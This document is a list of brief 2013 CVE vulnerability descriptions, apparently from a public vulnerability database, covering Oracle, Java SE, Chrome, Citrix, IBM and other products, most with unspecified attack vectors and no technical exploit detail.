Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect integrity via unknown vectors related to Rich Text Editor.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite Access Gate 1.2.1 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 8.1, 8.2, and 8.3 allows remote authenticated users to affect integrity via unknown vectors related to Web Access.
Unspecified vulnerability in Oracle Solaris 11 allows local users to affect availability via unknown vectors related to Kernel/VM.
Unspecified vulnerability in the Oracle Endeca Server component in Oracle Fusion Middleware 7.4.0 and 7.5.1.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2013-3763.
Unspecified vulnerability in the Oracle Endeca Server component in Oracle Fusion Middleware 7.4.0 and 7.5.1.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2013-3764.
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1; EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.2, 12.1.0.3, and 12.1.0.4 allows remote attackers to affect integrity via unknown vectors related to Schema Management.
Unspecified vulnerability in the Oracle executable component in Oracle Database Server 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2013-3771.
Unspecified vulnerability in the Enterprise Manager (EM) Base Platform 10.2.0.5 and 11.1.0.1; EM DB Control 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3; and EM Plugin for DB 12.1.0.2 and 12.1.0.3 in Oracle Enterprise Manager Grid Control allows remote attackers to affect integrity via unknown vectors related to Schema Management.
Unspecified vulnerability in the Oracle Landed Cost Management component in Oracle E-Business Suite 12.1.1, 12.1.2, and 12.1.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Shipment Workbench.
Unspecified vulnerability in the Solaris Cluster component in Oracle and Sun Systems Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to HA for TimesTen.
Unspecified vulnerability in the XML Parser component in Oracle Database Server 11.2.0.2, 11.2.0.3, and 12.1.0.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle Solaris 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Kernel/VM
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote authenticated users to affect confidentiality via unknown vectors related to Logging.  NOTE: the previous information is from the July 2013 CPU. Oracle has not commented on claims from a third party that the issue is due to storage of credentials in the (1) FND_LOG_MESSAGES database table or (2) log files by "native login pages."
Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote authenticated users to affect confidentiality via unknown vectors related to Client System Analyzer.
Unspecified vulnerability in the Solaris Cluster component in Oracle and Sun Systems Products Suite 3.2, 3.3, and 4 prior to 4.1 SRU 3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Zone Cluster Infrastructure.
Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 allows local users to affect availability via unknown vectors related to Libraries/Libc.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier allows remote attackers to affect integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2013-2400.
Dahua DVR appliances have a hardcoded password for (1) the root account and (2) an unspecified "backdoor" account, which makes it easier for remote attackers to obtain administrative access via authorization requests involving (a) ActiveX, (b) a standalone client, or (c) unknown other vectors.
The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929.
HP Insight Diagnostics 9.4.0.4710 allows remote attackers to conduct unspecified injection attacks via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in Cisco Linksys WRT110 allows remote attackers to hijack the authentication of users for requests that have unspecified impact via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the Related Posts by Zemanta plugin before 1.3.2 for WordPress allows remote attackers to hijack the authentication of unspecified users for requests that change settings via unknown vectors.
An unspecified function in Cisco Unified Communications Manager (CUCM) 7.1(x) through 9.1(2) allows remote authenticated users to execute arbitrary commands via unknown vectors, aka Bug ID CSCuh73440.
Unspecified vulnerability in Request Tracker (RT) 3.8.x before 3.8.17 and 4.0.x before 4.0.13, when using the Apache::Session::File session store, allows remote attackers to obtain sensitive information (user preferences and caches) via unknown vectors, related to a "limited session re-use."
Unspecified vulnerability in Adobe ColdFusion 9.0 through 9.0.2, when the JRun application server is used, allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to read arbitrary files via unknown vectors.
Unspecified vulnerability in OpenText/IXOS ECM for SAP NetWeaver allows remote attackers to execute arbitrary ABAP code via unknown vectors.
Unspecified vulnerability in Opera before 12.15 has unknown impact and attack vectors, related to a "moderately severe issue."
Unspecified vulnerability in IBM Rational Requirements Composer before 4.0.4 makes it easier for remote attackers to discover credentials via unknown vectors.
Unspecified vulnerability in IBM Rational Requirements Composer before 4.0.4 makes it easier for local users to gain privileges via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM Java 1.4.2 before 1.4.2 SR13-FP18, 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 allows remote attackers to affect confidentiality, availability, and integrity via unknown vectors, a different vulnerability than CVE-2013-3009 and CVE-2013-3011.
Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM Java 1.4.2 before 1.4.2 SR13-FP18, 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 allows remote attackers to affect confidentiality, availability, and integrity via unknown vectors, a different vulnerability than CVE-2013-3009 and CVE-2013-3012.
Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM Java 6.0.1 before 6.0.1 SR6 and 7 before 7 SR5 allows remote attackers to affect confidentiality, availability, and integrity via unknown vectors, a different vulnerability than CVE-2013-3007.
Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM Java 7 before 7 SR5 allows remote attackers to affect confidentiality, availability, and integrity via unknown vectors, a different vulnerability than CVE-2013-3006.
Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM Java 6.0.1 before 6.0.1 SR6 and 7 before 7 SR5 allows remote attackers to affect confidentiality, availability, and integrity via unknown vectors, a different vulnerability than CVE-2013-3006.
Unspecified vulnerability in the Java Runtime Environment (JRE) in IBM Java 7 before 7 SR5 allows remote attackers to affect confidentiality, availability, and integrity via unknown vectors, a different vulnerability than CVE-2013-3008.
Unspecified vulnerability in SOAP Gateway in IBM IMS Enterprise Suite 1.1, 2.1, and 2.2 allows remote authenticated users to execute arbitrary commands via unknown vectors.
IBM WebSphere Commerce 7.0 Feature Pack 4 and Feature Pack 5 incorrectly maintains a valid session after unspecified interaction with REST services, which allows remote attackers to issue REST requests in the context of an arbitrary user's active session via unknown vectors.
IBM WebSphere Commerce 6.x through 6.0.0.11 and 7.x through 7.0.0.7 does not properly perform authentication for unspecified web services, which allows remote attackers to issue requests in the context of an arbitrary user's active session via unknown vectors.
Unspecified vulnerability in IBM QRadar Security Information and Event Manager (SIEM) 7.x before 7.1 MR2 Patch 1 allows remote authenticated users to execute operating-system commands via unknown vectors.
Unspecified vulnerability in Citrix CloudPortal Services Manager (aka Cortex) 10.0 before Cumulative Update 3 has unknown impact and attack vectors, a different vulnerability than other CVEs listed in CTX137162.
Unspecified vulnerability in Citrix CloudPortal Services Manager (aka Cortex) 10.0 before Cumulative Update 3 has unknown impact and attack vectors, a different vulnerability than other CVEs listed in CTX137162.
Unspecified vulnerability in Citrix CloudPortal Services Manager (aka Cortex) 10.0 before Cumulative Update 3 has unknown impact and attack vectors, a different vulnerability than other CVEs listed in CTX137162.
Unspecified vulnerability in Citrix CloudPortal Services Manager (aka Cortex) 10.0 before Cumulative Update 3 has unknown impact and attack vectors, related to debugging messages, a different vulnerability than other CVEs listed in CTX137162.
Unspecified vulnerability in Citrix CloudPortal Services Manager (aka Cortex) 10.0 before Cumulative Update 3 has unknown impact and attack vectors, a different vulnerability than other CVEs listed in CTX137162.
Unspecified vulnerability in Citrix CloudPortal Services Manager (aka Cortex) 10.0 before Cumulative Update 3 has unknown impact and attack vectors, a different vulnerability than other CVEs listed in CTX137162.
Unspecified vulnerability in Citrix CloudPortal Services Manager (aka Cortex) 10.0 before Cumulative Update 3 has unknown impact and attack vectors, a different vulnerability than other CVEs listed in CTX137162.
Multiple unspecified vulnerabilities in Google Chrome before 31.0.1650.48 allow attackers to execute arbitrary code or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 30.0.1599.101 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Use-after-free vulnerability in International Components for Unicode (ICU), as used in Google Chrome before 30.0.1599.66 and other products, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 30.0.1599.66 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Google V8, as used in Google Chrome before 30.0.1599.66, allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in modules/webaudio/AudioScheduledSourceNode.cpp in the Web Audio implementation in Blink, as used in Google Chrome before 30.0.1599.66, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple integer overflows in (1) libGLESv2/renderer/Renderer9.cpp and (2) libGLESv2/renderer/Renderer11.cpp in Almost Native Graphics Layer Engine (ANGLE), as used in Google Chrome before 29.0.1547.57, allow remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 29.0.1547.57 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 28.0.1500.95 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 28.0.1500.71 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 27.0.1453.110 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
The PDF functionality in Google Chrome before 27.0.1453.110 allows remote attackers to cause a denial of service (invalid free operation) or possibly have unspecified other impact via unknown vectors.
Skia, as used in Google Chrome before 27.0.1453.110, does not properly handle GPU acceleration, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the SVG implementation in Google Chrome before 27.0.1453.110 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the HTML5 Audio implementation in Google Chrome before 27.0.1453.110 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
The Developer Tools API in Google Chrome before 27.0.1453.110 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 27.0.1453.110 on Windows provides an incorrect handle to a renderer process in unspecified circumstances, which allows remote attackers to cause a denial of service or possibly have other impact via unknown vectors.
Race condition in the workers implementation in Google Chrome before 27.0.1453.93 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the media loader in Google Chrome before 27.0.1453.93 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2013-2840.
The Web Audio implementation in Google Chrome before 27.0.1453.93 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the media loader in Google Chrome before 27.0.1453.93 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2013-2846.
Google Chrome before 27.0.1453.93 does not properly perform a cast of an unspecified variable during handling of clipboard data, which allows remote attackers to cause a denial of service or possibly have other impact via unknown vectors.
Use-after-free vulnerability in the SVG implementation in Google Chrome before 27.0.1453.93 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 27.0.1453.93 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Unspecified vulnerability in Citrix NetScaler Access Gateway Enterprise Edition (AGEE) before 9.3.62.4 and 10.x through 10.0.74.4, and NetScaler AGEE Common Criteria build before 9.3.53.6, allows remote attackers to bypass intended intranet access restrictions via unknown vectors.
Citrix CloudPlatform (formerly Citrix CloudStack) 3.0.x before 3.0.6 Patch C does not properly restrict access to VNC ports on the management network, which allows remote attackers to have unspecified impact via unknown vectors.
Multiple unspecified vulnerabilities in the System Management (aka SysAdmin) Console in EMC Smarts Network Configuration Manager (NCM) through 9.2 have unknown impact and attack vectors, a different issue than CVE-2013-0935.  NOTE: this might overlap CVEs for open-source server components or other third-party components.
Cross-site request forgery (CSRF) vulnerability in the Social Sharing Toolkit plugin 2.1.1 for WordPress allows remote attackers to hijack the authentication of administrators for requests that manipulate plugin settings via unknown vectors.
Unspecified vulnerability in Microsoft Windows 8 allows remote attackers to cause a denial of service (reboot) or possibly have unknown other impact via a crafted TrueType Font (TTF) file, as demonstrated by the 120612-69701-01.dmp error report.
The sandbox protection mechanism in Microsoft Internet Explorer 9 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013.
Unspecified vulnerability in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 through SP1 allows attackers to bypass the ASLR protection mechanism via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013, aka "ASLR Security Feature Bypass Vulnerability."
Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR and DEP protection mechanisms via unknown vectors, as demonstrated against Firefox by VUPEN during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0787.
Unspecified vulnerability in the kernel in Microsoft Windows 7 allows local users to gain privileges via unknown vectors, as demonstrated by Nils and Jon of MWR Labs during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0912.
Unspecified vulnerability in Adobe Reader 11.0.02 allows attackers to bypass the sandbox protection mechanism via unknown vectors, as demonstrated by George Hotz during a Pwn2Own competition at CanSecWest 2013.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass the Java sandbox via vectors related to "Incorrect ByteBandedRaster size checks" in 2D.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass the Java sandbox via vectors related to "Incorrect ShortBandedRaster size checks" in 2D.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass the Java sandbox via vectors related to "Incorrect IntegerComponentRaster size checks."
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass the Java sandbox via vectors related to "ImagingLib byte lookup processing."
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass the Java sandbox via vectors related to "Incorrect image layout verification" in 2D.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-2442 and CVE-2013-2466.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 5.0 Update 45 and earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to the Java installer.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-2442 and CVE-2013-2468.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass the Java sandbox via vectors related to "Incorrect image channel verification" in 2D.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D, a different vulnerability than CVE-2013-2463, CVE-2013-2465, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471, CVE-2013-2472, and CVE-2013-2473.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass the Java sandbox via vectors related to "Incorrect image attribute verification" in 2D.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier; the Oracle JRockit component in Oracle Fusion Middleware R27.7.5 and earlier and R28.2.7 and earlier; and OpenJDK 7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.  NOTE: the previous information is from the June and July 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass verification of XML signatures via vectors related to a "Missing check for [a] valid DOMCanonicalizationMethod canonicalization algorithm."
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Serviceability.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass the Java sandbox via vectors related to "insufficient access checks" in the tracing component.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Libraries.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass the Java sandbox via "an error related to method handles."
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality via unknown vectors related to Serialization.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to improper access checks for subclasses in the ObjectOutputStream class.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality via unknown vectors related to Libraries, a different vulnerability than CVE-2013-2443 and CVE-2013-2452.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to incorrect access checks by the (1) getEnclosingClass, (2) getEnclosingMethod, and (3) getEnclosingConstructor methods.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality via unknown vectors related to Libraries, a different vulnerability than CVE-2013-2443 and CVE-2013-2455.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "network address handling in virtual machine identifiers" and the lack of "unique and unpredictable IDs" in the java.rmi.dgc.VMID class.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier, and OpenJDK 7, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Networking.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to improper enforcement of exclusive port binds when running on Windows, which allows attackers to bind to ports that are already in use.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect availability via unknown vectors related to Serialization.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to improper handling of circular references in ObjectStreamClass.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality via unknown vectors related to Libraries.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to GnomeFileTypeDetector and a missing check for read permissions for a path.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Sound.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass the Java sandbox via vectors related to insufficient "access restrictions" and "robustness of sound classes."
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality via unknown vectors related to Networking.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to obtain a socket's local address via vectors involving inconsistencies between Socket.getLocalAddress and InetAddress.getLocalHost.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect availability via unknown vectors related to Hotspot.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue allows remote attackers to bypass the Java sandbox via vectors related to "handling of memory allocation errors."
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality via unknown vectors related to Libraries, a different vulnerability than CVE-2013-2452 and CVE-2013-2455.  NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is due to an incorrect "checking order" within the AccessControlContext class.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-2466 and CVE-2013-2468.
Unspecified vulnerability in the Agile EDM component in Oracle Supply Chain Products Suite 6.1.1.0, 6.1.2.0, and 6.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to Java Client.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and 6 Update 43 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-2435.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, 5.0 Update 41 and earlier, and JavaFX 2.2.7 and earlier allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Install.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier allows remote attackers to affect integrity via unknown vectors related to JavaFX.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Deployment.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2013-1488 and CVE-2013-2426.  NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to incorrect "type checks" and "method handle binding" involving Wrapper.convert.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and 6 Update 43 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2013-2440.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and JavaFX 2.2.7 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and 6 Update 43 and earlier allows remote attackers to affect integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2013-1540.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, 5.0 Update 41 and earlier, and JavaFX 2.2.7 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D, a different vulnerability than CVE-2013-2394 and CVE-2013-1491.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, and OpenJDK 6 and 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to HotSpot.  NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to bypassing the Java sandbox using "method handle intrinsic frames."
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and 5.0 Update 41 and earlier; JavaFX 2.2.7 and earlier; and OpenJDK 6 and 7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to ImageIO. NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "JPEGImageReader state corruption" when using native code.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and 5.0 Update 41 and earlier; and OpenJDK 6 and 7; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to ImageIO.  NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to "JPEGImageWriter state corruption" when using native code, which triggers memory corruption.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and JavaFX 2.2.7 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to JavaFX, a different vulnerability than CVE-2013-0402, CVE-2013-2414, and CVE-2013-2427.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier and JavaFX 2.2.7 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to JavaFX, a different vulnerability than CVE-2013-0402, CVE-2013-2414, and CVE-2013-2428.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, and OpenJDK 6 and 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.  NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to incorrect invocation of the defaultReadObject method in the ConcurrentHashMap class, which allows remote attackers to bypass the Java sandbox.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Install.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, and OpenJDK 7, allows remote attackers to affect integrity via unknown vectors related to HotSpot.  NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from the original researcher that this vulnerability allows remote attackers to bypass permission checks by the MethodHandles method and modify arbitrary public final fields using reflection and type confusion, as demonstrated using integer and double fields to disable the security manager.
